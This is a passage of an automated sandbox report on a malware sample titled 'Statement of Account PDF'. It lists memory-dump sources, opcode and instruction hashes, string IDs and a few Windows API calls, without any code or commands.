                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q
                                                        • API String ID: 0-831282457
                                                        • Opcode ID: 1d7e344b2c225d2c0a6c3ee35ffce38d3eefe365f90f373d7470714c06411b4a
                                                        • Instruction ID: 98b79435e62a786ec1c59d9c041b35a668a624b5323724a360c07278d0ecb4f6
                                                        • Opcode Fuzzy Hash: 1d7e344b2c225d2c0a6c3ee35ffce38d3eefe365f90f373d7470714c06411b4a
                                                        • Instruction Fuzzy Hash: 53628430B0020A9FCB15EB68D5A0A5EB7F2FF84304F218929D4159F759DB71ED8ACB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$(bq$(bq
                                                        • API String ID: 0-2716923250
                                                        • Opcode ID: 9f80f65ae2b7a6ffc564207080d5d5e01b8ea10f598138a5bcbd08c6b99b544b
                                                        • Instruction ID: a3e9818c41687095141bb9e35416036bc5521ac109275f97c90f17b048112dbf
                                                        • Opcode Fuzzy Hash: 9f80f65ae2b7a6ffc564207080d5d5e01b8ea10f598138a5bcbd08c6b99b544b
                                                        • Instruction Fuzzy Hash: 69D1AC30E002098FDB19DFB9C86469EBBF2FF89354F148569E445AB391DB34AD81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fcq$XPcq$\Ocq
                                                        • API String ID: 0-3575482020
                                                        • Opcode ID: 87ec04517d9cf0f6632f16417dac6fad96604083288a3ffc1feaee1e77f0d244
                                                        • Instruction ID: e50ba71309610c4bb2b5b670f972175095df425e06432ee3c8a38ba5f73b558c
                                                        • Opcode Fuzzy Hash: 87ec04517d9cf0f6632f16417dac6fad96604083288a3ffc1feaee1e77f0d244
                                                        • Instruction Fuzzy Hash: 52617030E002089FEF54DFA5C854BAEBAF6EF88700F20842AE509AB395DF755D459F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: cc93dc6c6f5958c976d48a8cbd20d45d57f4e263e4bf3573e5d15a55bbb06420
                                                        • Instruction ID: 0f60c431f3e63cdb218a7f53354abfb20147c70a7982e123e99d175578e8fc39
                                                        • Opcode Fuzzy Hash: cc93dc6c6f5958c976d48a8cbd20d45d57f4e263e4bf3573e5d15a55bbb06420
                                                        • Instruction Fuzzy Hash: 23514470B101199FDF54EB65DA60B6E73FAEF88244F148469C909DB788DA30EC42CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 010181E0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4073010284.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1010000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: de48f63dd1de2ec36bcb688b880b91511f3ec439a3b2a05e3f5d4a8a72dd7174
                                                        • Instruction ID: e9e23f0036f0f97227f06d7ac266fbee80906fb9fd9eacf8a27c94ee621dc22f
                                                        • Opcode Fuzzy Hash: de48f63dd1de2ec36bcb688b880b91511f3ec439a3b2a05e3f5d4a8a72dd7174
                                                        • Instruction Fuzzy Hash: 152127B2C006599BCB14CF9AC5447DEFBF4FB48320F10856AE958A7244D738AA44CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 010181E0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4073010284.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1010000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 2417569666f447bfddf8384c105029756de40efb189997a83f56d96da66bc001
                                                        • Instruction ID: ef12bedd9b3d696eaacdabe44400ca949ecfe1ca14ce2f70c40e1b3b2bec7c12
                                                        • Opcode Fuzzy Hash: 2417569666f447bfddf8384c105029756de40efb189997a83f56d96da66bc001
                                                        • Instruction Fuzzy Hash: DF2136B2C0065A9FDB14CFAAC5447DEFBF4BF08320F14856AD958A7254D338AA44CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0101F0EF
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4073010284.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1010000_Statement of Account PDF.jbxd

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XPcq
                                                        • API String ID: 0-714321711
                                                        • Opcode ID: d48aa812503366016363de3660d984c8209ef1c74a13b0ec1304ce86cc105bb6
                                                        • Instruction ID: 567bd5e85fdc40f1cc4a69ebd6ded2f4b945a2996ef458df5d68138bedbee2f0
                                                        • Opcode Fuzzy Hash: d48aa812503366016363de3660d984c8209ef1c74a13b0ec1304ce86cc105bb6
                                                        • Instruction Fuzzy Hash: C4418C30B002089FDB55DFA5C854BAEBBF6BF88700F20852AE109AB395DB749C419F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 8ff9725ffd7ef2afdcaec675ef5846f576eb2218533545434fab45da3ea02878
                                                        • Instruction ID: 746f9c2b868674f572fe7089647510ef74a0816386bc07c3c00f92d4b2471cf3
                                                        • Opcode Fuzzy Hash: 8ff9725ffd7ef2afdcaec675ef5846f576eb2218533545434fab45da3ea02878
                                                        • Instruction Fuzzy Hash: EC418030E002099FDF55EFA5C85469EBBB6FF85300F214529D806EB740DB71E94ACB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 9b9248386405d1c4d6e9fbe88ec09eef105c8d360d276fc267d91f2aebe3d975
                                                        • Instruction ID: 422e67df3f2841b5eb661f6225a66606215e57b5d7f95846a14161cffc2e5187
                                                        • Opcode Fuzzy Hash: 9b9248386405d1c4d6e9fbe88ec09eef105c8d360d276fc267d91f2aebe3d975
                                                        • Instruction Fuzzy Hash: D1419130E002099FDB65EF75C89469EBBB6FF85300F21492AD851EB740EB71D94ACB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: e9760700a0e1a5640480c9f04f9a4f1ff89510d615d7fea00de6e8e3c0299de0
                                                        • Instruction ID: aba0bd4c2ab574562506ced4b088ccdc6bacc3f51006dab1acc0e9214bdea24e
                                                        • Opcode Fuzzy Hash: e9760700a0e1a5640480c9f04f9a4f1ff89510d615d7fea00de6e8e3c0299de0
                                                        • Instruction Fuzzy Hash: 9B314630B002059FCB49EB74C91836E7BA7AF89204F258929C406DB394EF35DE46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 0d673b75f806f5d1a1582a315d1a1e50a54755d7c8f2cb97832c8cde7deaa8c1
                                                        • Instruction ID: ebcd601771cd993d2e1ca8bf78a7309a7aaed11f18f6e461806501b33ee4913c
                                                        • Opcode Fuzzy Hash: 0d673b75f806f5d1a1582a315d1a1e50a54755d7c8f2cb97832c8cde7deaa8c1
                                                        • Instruction Fuzzy Hash: 8E310530B002059FDB49EB74C91876F7BE7AF88200F208429D806DB394EE35DE46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q
                                                        • API String ID: 0-388095546
                                                        • Opcode ID: ab6413ebff45a522c385d954da5e987690b1b6fa6aae8cbf1d3160d0abdc8a33
                                                        • Instruction ID: 81554cb08aa267a6d4c6f2c26cfe56a6a3200d57be69798c160972537c185c6c
                                                        • Opcode Fuzzy Hash: ab6413ebff45a522c385d954da5e987690b1b6fa6aae8cbf1d3160d0abdc8a33
                                                        • Instruction Fuzzy Hash: 79F02230B04229DFDF68EA59EB912B877B9FB40340F220826CD05CBA04D731ED06CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc72123dddbd5e2adb6bf50ef06d46b980e3d3a9fd388e2a3721adb04d11682b
                                                        • Instruction ID: e6cdd36c2c552265ed23ed1820624940099c5b720cc8e62def1e4fb1bbd9d970
                                                        • Opcode Fuzzy Hash: bc72123dddbd5e2adb6bf50ef06d46b980e3d3a9fd388e2a3721adb04d11682b
                                                        • Instruction Fuzzy Hash: BB418B30E00709DFDB19DF69C85469DBBF2FF89314F148659E5497B260EB70A981CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2816d1df523e11d38b8f1baf76b89f001e6179e6e87d0917be81d54ad9a654b9
                                                        • Instruction ID: 13197bdee2dd9d2272a2d14bb70100b34c6ed32682df54dee999e15b5a718d1f
                                                        • Opcode Fuzzy Hash: 2816d1df523e11d38b8f1baf76b89f001e6179e6e87d0917be81d54ad9a654b9
                                                        • Instruction Fuzzy Hash: 17A1C834F101099FDF64DFACC9A07AE77AAEB85310F314825E809E7799CA35DC828B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 982337e7249e12e5bded693408f148341e735d7b9a76306da2897aea165beb71
                                                        • Instruction ID: b5056a97c287051878445e586c9e702cd701013fe51ca3f02c8a6e7a39c6290c
                                                        • Opcode Fuzzy Hash: 982337e7249e12e5bded693408f148341e735d7b9a76306da2897aea165beb71
                                                        • Instruction Fuzzy Hash: 2961C171F001214FCF509A7EC89466FBADBAFC4624B66443AD80EDB364DE66DD0287C2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 642dad5dc3ba15d54af314e2f1eb8752d6ad0e9b86b2a2209ed4da80f3990d0e
                                                        • Instruction ID: a28eeb849d438dee2669fa5f064ee72e88ff10c699c83e50b153946d654d5c36
                                                        • Opcode Fuzzy Hash: 642dad5dc3ba15d54af314e2f1eb8752d6ad0e9b86b2a2209ed4da80f3990d0e
                                                        • Instruction Fuzzy Hash: 53816234B102099FDF94DFA4D59479EB7F6AF84704F218529D80ADB794EB34EC828B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2942dfa99720f9f7a4a7a8fd994d3dba5682c0579d7fffc813b18a4d22f39788
                                                        • Instruction ID: b7afe19deaf6483175b3b39261db4f9eda1681efb1a1165342555dab63808ac3
                                                        • Opcode Fuzzy Hash: 2942dfa99720f9f7a4a7a8fd994d3dba5682c0579d7fffc813b18a4d22f39788
                                                        • Instruction Fuzzy Hash: 1E913F30E106198FDF60DF68C890B9DB7B1FF85700F208695D549BB295EB70AA85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e12ae364185d70aa3cd358427d6e6793137f7fa7d3c96ac63f41ece6ce38cda5
                                                        • Instruction ID: 8babb1faf172409f07135f70e95f73012663bdc8e015fef3f17f4b2c807c1786
                                                        • Opcode Fuzzy Hash: e12ae364185d70aa3cd358427d6e6793137f7fa7d3c96ac63f41ece6ce38cda5
                                                        • Instruction Fuzzy Hash: BB816134B102099FDF84DFA9D55475EB7F6AF88704F218429D80ADB794EB34EC828B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: addce84e774c5ce5ce32eda213c49e3804f7906932a44fe8116557f01c5cc849
                                                        • Instruction ID: dd3b1f4728fab967631b8474ff8fd34b3a0dd3079eded2bfbc5c2b3dac2ba3ac
                                                        • Opcode Fuzzy Hash: addce84e774c5ce5ce32eda213c49e3804f7906932a44fe8116557f01c5cc849
                                                        • Instruction Fuzzy Hash: 44913E30E106198BDF60DF68C890B9DB7B1FF89700F208595D549BB395EB70AA85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8d580352fc8e488e84bf8c9692de8247877704fe19e311d4fa4b2d6d27331d6
                                                        • Instruction ID: cf878491c86d26e4ccf5981aa0542967e91629478c69b343a52efeed49bd2d8c
                                                        • Opcode Fuzzy Hash: e8d580352fc8e488e84bf8c9692de8247877704fe19e311d4fa4b2d6d27331d6
                                                        • Instruction Fuzzy Hash: ED717B70A002099FCB54DFA9D990A9DBBF6FF84310F258429E849EB758DB31ED46CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40ef4032cc508338b29c4f19d19ad4a7601ba284175f4ef43386055788b1fc03
                                                        • Instruction ID: dbefb6fc8e79e97bb696a98625843cb5a61575e057b13840c421171d866b92c1
                                                        • Opcode Fuzzy Hash: 40ef4032cc508338b29c4f19d19ad4a7601ba284175f4ef43386055788b1fc03
                                                        • Instruction Fuzzy Hash: 44716C70A002099FCB44DFA9D990A9EBBF6FF84314F258429E805EB758DB30ED46CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 780af3566622db3a6b0395e637d8c66bdb3e5e1923ddbd1db7f3c824c64078d7
                                                        • Instruction ID: 856c987411f7b5ca229a375aacdae9f476ecb32760412266e0c7b0dc14ec192f
                                                        • Opcode Fuzzy Hash: 780af3566622db3a6b0395e637d8c66bdb3e5e1923ddbd1db7f3c824c64078d7
                                                        • Instruction Fuzzy Hash: 2E51C031E00209DFCF14EB78E4946AEB7B6EF84325F21887AE50AD7650DB319945CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 623eaa1f0a23253fa3213e23cc003eb7df953c42e0c47297ca79ba476bc05809
                                                        • Instruction ID: ae4fe0dabd2e8a421442d3f4e365795f2e44f61ed8262253d6923a52a1e5a5ea
                                                        • Opcode Fuzzy Hash: 623eaa1f0a23253fa3213e23cc003eb7df953c42e0c47297ca79ba476bc05809
                                                        • Instruction Fuzzy Hash: 0351B930B102049FEF64A66CD96476F365ED789320F21483AE80AD7799DA7ACC454BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65515c569f5ecdc42f333125e4796fe65438364053a4e50b707c553352b58e79
                                                        • Instruction ID: 93363f22d052b08eaf88e06c133f766066d6ee8641c5bebf1793fd93187893f7
                                                        • Opcode Fuzzy Hash: 65515c569f5ecdc42f333125e4796fe65438364053a4e50b707c553352b58e79
                                                        • Instruction Fuzzy Hash: 3B51B930B10204DFEF64A66CD96476F365ED789320F314826E81ED7798DA7ACC454BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9722e1a0a04453ccc69bdbf390934f4101fd40408630520b240fac8fc00d09d
                                                        • Instruction ID: e037297a41f77ec8b37f97c88d107c4c611b28bd18bcd228d52864ab94740cf1
                                                        • Opcode Fuzzy Hash: d9722e1a0a04453ccc69bdbf390934f4101fd40408630520b240fac8fc00d09d
                                                        • Instruction Fuzzy Hash: B0416F71E006098FDF70CE99D880AAFF7B6EB84310F22492AE516D7A51D330E8558B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e072b5c462b139cc1e1e1e6b3edc3ca4d8df4ecbfca9e5f7a892249cdf26ffd
                                                        • Instruction ID: 304c9ca01f9ea6f20e8b0ce97185c615515cfe1a94d001bbf92d03717603349c
                                                        • Opcode Fuzzy Hash: 2e072b5c462b139cc1e1e1e6b3edc3ca4d8df4ecbfca9e5f7a892249cdf26ffd
                                                        • Instruction Fuzzy Hash: 2531C430E1030A9FCF25DF65C9A069EB7B5EF85304F254929E805EB714EB70E94ACB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75d797b1365046b0756f04b6bf55011c6bb6e8d5a54a51e9b3b0513ff490f675
                                                        • Instruction ID: ebb92f1863fc010ebd185bb29007c997a27107dee6b88d9eaaf0e18ae0e0ddd9
                                                        • Opcode Fuzzy Hash: 75d797b1365046b0756f04b6bf55011c6bb6e8d5a54a51e9b3b0513ff490f675
                                                        • Instruction Fuzzy Hash: EA212971904245DFCB08DF14D6C5F2ABBA5FB84324F20C57DD9094B296C376E846DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 227d49ff2338da979737a1fe5d0777de3d12202cbdac8844d8931566f3422168
                                                        • Instruction ID: 2282c0575c4a5486089988f007856787c68a94519083416efba2043b97b06719
                                                        • Opcode Fuzzy Hash: 227d49ff2338da979737a1fe5d0777de3d12202cbdac8844d8931566f3422168
                                                        • Instruction Fuzzy Hash: 92214672904245DFCB04DF14DAC4F6EBB65FB84324F20C67DD8490B241C376D806DA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3964a6103ddd21eab78fc2767ebe1aac221b66ea0ec19dc27b3ff771ac72b04c
                                                        • Instruction ID: ecc1114c7fb64fd5cd30ba8430f41488a7016e9e115431278c4bbdda6b800836
                                                        • Opcode Fuzzy Hash: 3964a6103ddd21eab78fc2767ebe1aac221b66ea0ec19dc27b3ff771ac72b04c
                                                        • Instruction Fuzzy Hash: 04217971544205DFCB00DF18CAC1F2ABB65FB84324F20C57DE8494B356C736D846EA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e74b5c923661f20ccb46e9efcdee950e35c627d7c3c0a8b7924cafb97e93c4f
                                                        • Instruction ID: a715b352e27f8a102860a88216939905b1e1b1a426dda92ec3f0c68cc281e34e
                                                        • Opcode Fuzzy Hash: 6e74b5c923661f20ccb46e9efcdee950e35c627d7c3c0a8b7924cafb97e93c4f
                                                        • Instruction Fuzzy Hash: 9F2104B1944241DFEB05DF14CAC1F2ABFA5FB94324F28C67DD8094B262C336D846D661
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f92f97f756ba394819ed6f037e428786f95b88abd88be05d04281d67e5e4d85b
                                                        • Instruction ID: 757ef873801eb91aa7b90d17a279d90cecd299102231e2907a2e308f7b674c30
                                                        • Opcode Fuzzy Hash: f92f97f756ba394819ed6f037e428786f95b88abd88be05d04281d67e5e4d85b
                                                        • Instruction Fuzzy Hash: C331C2B0D01218DFDB25CF99C594B9EBBF5EB48358F14805AE404AB290C7B59885CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
